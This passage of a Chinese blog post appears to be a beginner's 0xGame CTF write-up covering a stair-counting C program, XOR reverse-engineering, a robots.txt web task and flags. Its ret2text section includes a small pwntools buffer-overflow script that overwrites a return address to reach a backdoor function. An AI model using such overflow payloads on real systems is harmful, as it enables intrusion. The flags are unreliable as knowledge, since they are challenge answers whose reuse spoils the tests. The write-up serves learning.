(!<span class="built_in">isBroken</span>(<span class="number">2</span>, numberOfBrokenStairs, listOfBrokenStairs)) &#123;</span><br><span class="line">			numberOfWays[<span class="number">2</span>] = numberOfWays[<span class="number">3</span>] + <span class="number">1</span>;</span><br><span class="line">		&#125; <span class="comment">// else numberOfWays[2] = 0, 与初值相同，省略。</span></span><br><span class="line"></span><br><span class="line">		<span class="comment">// 第3级台阶的特殊处理</span></span><br><span class="line">		<span class="keyword">if</span> (!<span class="built_in">isBroken</span>(<span class="number">3</span>, numberOfBrokenStairs, listOfBrokenStairs)) &#123;</span><br><span class="line">			numberOfWays[<span class="number">1</span>] = (numberOfWays[<span class="number">3</span>] == <span class="number">0</span> ? <span class="number">0</span> : numberOfWays[<span class="number">3</span>]) +</span><br><span class="line">							  (numberOfWays[<span class="number">2</span>] == <span class="number">0</span> ? <span class="number">0</span> : numberOfWays[<span class="number">2</span>]) + <span class="number">1</span>;</span><br><span class="line">		&#125; <span class="comment">// else numberOfWays[1] = 0, 与初值相同，省略。</span></span><br><span class="line"></span><br><span class="line">		<span class="keyword">for</span> (<span class="type">int</span> stair = <span class="number">3</span>; stair &lt; numberOfStairs; stair++) &#123;</span><br><span class="line">			<span class="keyword">if</span> (!<span class="built_in">isBroken</span>(stair + <span class="number">1</span>, numberOfBrokenStairs, listOfBrokenStairs)) &#123;</span><br><span class="line">				numberOfWays[<span class="number">0</span>] = (numberOfWays[<span class="number">3</span>] == <span class="number">0</span> ? <span class="number">0</span> : numberOfWays[<span class="number">3</span>]) +</span><br><span class="line">							   	  (numberOfWays[<span class="number">2</span>] == <span class="number">0</span> ? <span class="number">0</span> : numberOfWays[<span class="number">2</span>]) +</span><br><span class="line">								  (numberOfWays[<span class="number">1</span>] == <span class="number">0</span> ? <span class="number">0</span> : numberOfWays[<span class="number">1</span>]);</span><br><span class="line">				numberOfWays[<span class="number">0</span>] = numberOfWays[<span class="number">0</span>] % <span class="number">1435756429</span>;</span><br><span class="line">			&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">				numberOfWays[<span class="number">0</span>] = <span class="number">0</span>;</span><br><span class="line">			&#125;</span><br><span class="line"></span><br><span class="line">			<span class="keyword">if</span> (stair + <span class="number">1</span> == numberOfStairs) &#123;</span><br><span class="line">				<span class="built_in">printf</span>(<span class="string">&quot;%d\t%lld\n&quot;</span>, stair + <span class="number">1</span>, numberOfWays[<span class="number">0</span>]);</span><br><span class="line">			&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">				<span class="keyword">if</span> (stair % <span class="number">10000</span> == <span class="number">9999</span>)</span><br><span class="line">					<span class="built_in">printf</span>(<span class="string">&quot;%d\t%lld\n&quot;</span>, stair + <span class="number">1</span>, numberOfWays[<span class="number">0</span>]);</span><br><span class="line">				<span class="keyword">for</span> (<span class="type">int</span> i = <span class="number">3</span>; i &gt; <span class="number">0</span>; i--) &#123;</span><br><span class="line">					numberOfWays[i] = numberOfWays[i - <span class="number">1</span>];</span><br><span class="line">				&#125;</span><br><span class="line">				numberOfWays[<span class="number">0</span>] = <span class="number">0</span>;</span><br><span class="line">			&#125;</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>将数据逐个代入进行运算</p>
<p>得到如下结果</p>
<table>
<thead>
<tr>
<th></th>
<th>result</th>
</tr>
</thead>
<tbody><tr>
<td>1</td>
<td>13</td>
</tr>
<tr>
<td>2</td>
<td>98</td>
</tr>
<tr>
<td>3</td>
<td>47</td>
</tr>
<tr>
<td>4</td>
<td>3359124</td>
</tr>
<tr>
<td>5</td>
<td>1205125</td>
</tr>
<tr>
<td>6</td>
<td>834118675</td>
</tr>
<tr>
<td>7</td>
<td>1289432148</td>
</tr>
<tr>
<td>8</td>
<td>1087983205</td>
</tr>
<tr>
<td>9</td>
<td>1176572515</td>
</tr>
<tr>
<td>10</td>
<td>566575482</td>
</tr>
<tr>
<td>SUM</td>
<td>4959246432</td>
</tr>
<tr>
<td>MOD</td>
<td>651977145</td>
</tr>
</tbody></table>
<p>把0xGame{}包上提交</p>
<p>Misc 签到</p>
<p>仔细阅读rules之后找到flag提交</p>
<h1 id="Pwn-ret2text"><a href="#Pwn-ret2text" class="headerlink" title="Pwn    ret2text"></a>Pwn    ret2text</h1><p>这是一道经典的题目，然并卵，该不会还是不会</p>
<p>在网上看了各种wp后还是无法理解，于是在小破站搜到了pwn入门的完整教程（perfect）</p>
<p>下面给出解题过程：</p>
<p>先瞅一眼，嗯64位的程序，拖进ida里F5反编译，找到main函数然后分析一波</p>
<p>大概就是用read函数写进去一串值覆盖掉rbp的地址使之执行backdoor的函数</p>
<p>根据pwndbg分析后得出位移量80字节，于是编写脚本</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">from pwn import*</span><br><span class="line">io = remote(&quot;.......(略)&quot;， 10003)</span><br><span class="line">io.recvline()</span><br><span class="line">io.sendline(b&#x27;A&#x27;*84+b&#x27;AAAA&#x27;+P64(0x401157))</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>

<p>运行后获得权限，ls打开根目录，看到flag直接cat出来</p>
<h1 id="Pwn？！"><a href="#Pwn？！" class="headerlink" title="Pwn？！"></a>Pwn？！</h1><p>打开虚拟机nc过去</p>
<p>ls到根目录，就可以看到flag文件</p>
<p>cat flag得到flag</p>
<h1 id="RE-our-Compilation-story"><a href="#RE-our-Compilation-story" class="headerlink" title="RE    our Compilation story"></a>RE    our Compilation story</h1><p>看题目代码得知是将flag通过一系列花里胡哨的运算输出了一串数字</p>
<table>
<thead>
<tr>
<th>a</th>
<th>113</th>
<th>119</th>
<th>113</th>
<th>65</th>
<th>15</th>
<th>54</th>
<th>32</th>
<th>98</th>
<th>83</th>
<th>91</th>
<th>54</th>
<th>59</th>
<th>104</th>
<th>105</th>
<th>10</th>
<th>88</th>
<th>7</th>
<th>109</th>
<th>7</th>
<th>112</th>
<th>89</th>
<th>126</th>
<th>47</th>
<th>46</th>
<th>77</th>
<th>112</th>
<th>23</th>
<th>125</th>
<th>65</th>
<th>121</th>
<th>26</th>
<th>30</th>
<th>31</th>
<th>104</th>
<th>45</th>
<th>44</th>
<th>21</th>
</tr>
</thead>
<tbody><tr>
<td>b</td>
<td>65</td>
<td>15</td>
<td>54</td>
<td>32</td>
<td>98</td>
<td>83</td>
<td>91</td>
<td>54</td>
<td>59</td>
<td>104</td>
<td>105</td>
<td>10</td>
<td>88</td>
<td>7</td>
<td>109</td>
<td>7</td>
<td>112</td>
<td>89</td>
<td>126</td>
<td>47</td>
<td>46</td>
<td>77</td>
<td>112</td>
<td>23</td>
<td>125</td>
<td>65</td>
<td>121</td>
<td>26</td>
<td>30</td>
<td>31</td>
<td>104</td>
<td>45</td>
<td>44</td>
<td>21</td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>flag</td>
<td>0</td>
<td>x</td>
<td>G</td>
<td>a</td>
<td>m</td>
<td>e</td>
<td>后面省略了</td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
</tbody></table>
<p>讲讲我是怎么算的：</p>
<p>根据输出的数据列出上面的表格，</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">for</span> x <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">128</span>):</span><br><span class="line">	<span class="keyword">if</span> <span class="built_in">ord</span>(<span class="built_in">chr</span>(a^x))==b:</span><br><span class="line">		<span class="built_in">print</span>(<span class="built_in">chr</span>(x))</span><br></pre></td></tr></table></figure>

<p>可以得到相应位置的flag的字符</p>
<p>py业务水平过低，只能一个一个来，最后得到flag：</p>
<p>0xGame{Th3_10ng_w4y_w3_901ng_fr33}</p>
<h1 id="RE-Signin-User-Friendly"><a href="#RE-Signin-User-Friendly" class="headerlink" title="RE  Signin: User Friendly"></a>RE  Signin: User Friendly</h1><p>下载附件拖到ida里，直接找到flag提交</p>
<h1 id="Web-robots"><a href="#Web-robots" class="headerlink" title="Web    robots"></a>Web    robots</h1><p>一开始半天不会</p>
<p>翻百度</p>
<p>在环境地址后面加&#x2F;robots.txt</p>
<p>看到411.html</p>
<p>那就加一个&#x2F;411.html</p>
<p>发现oh i have tell u all</p>
<p>猜flag藏在这里</p>
<p>检查页面源代码</p>
<p>找到flag</p>
<p>0xGame{Rob0t_le4ks_seCr3t}提交</p>

    </div>

    
    
    

    <footer class="post-footer">

        

          <div class="post-nav">
            <div class="post-nav-item">
            </div>
            <div class="post-nav-item">
                <a href="/2021/10/29/0xGame-%E7%AC%AC%E4%BA%8C%E5%91%A8/" rel="next" title="0xGame-第二周">
                  0xGame-第二周 <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">


<div class="copyright">
  &copy; 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">sCh3n</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/pisces/" rel="noopener" target="_blank">NexT.Pisces</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/next-boot.js"></script>

  




  




  

  <script class="next-config" data-name="enableMath" type="application/json">true</script><script class="next-config" data-name="mathjax" type="application/json">{"enable":true,"per_page":true,"tags":"none","js":{"url":"https://cdnjs.cloudflare.com/ajax/libs/mathjax/3.2.2/es5/tex-mml-chtml.js","integrity":"sha256-MASABpB4tYktI2Oitl4t+78w/lyA+D7b/s9GEP0JOGI="}}</script>
<script src="/js/third-party/math/mathjax.js"></script>



</body>
</html>
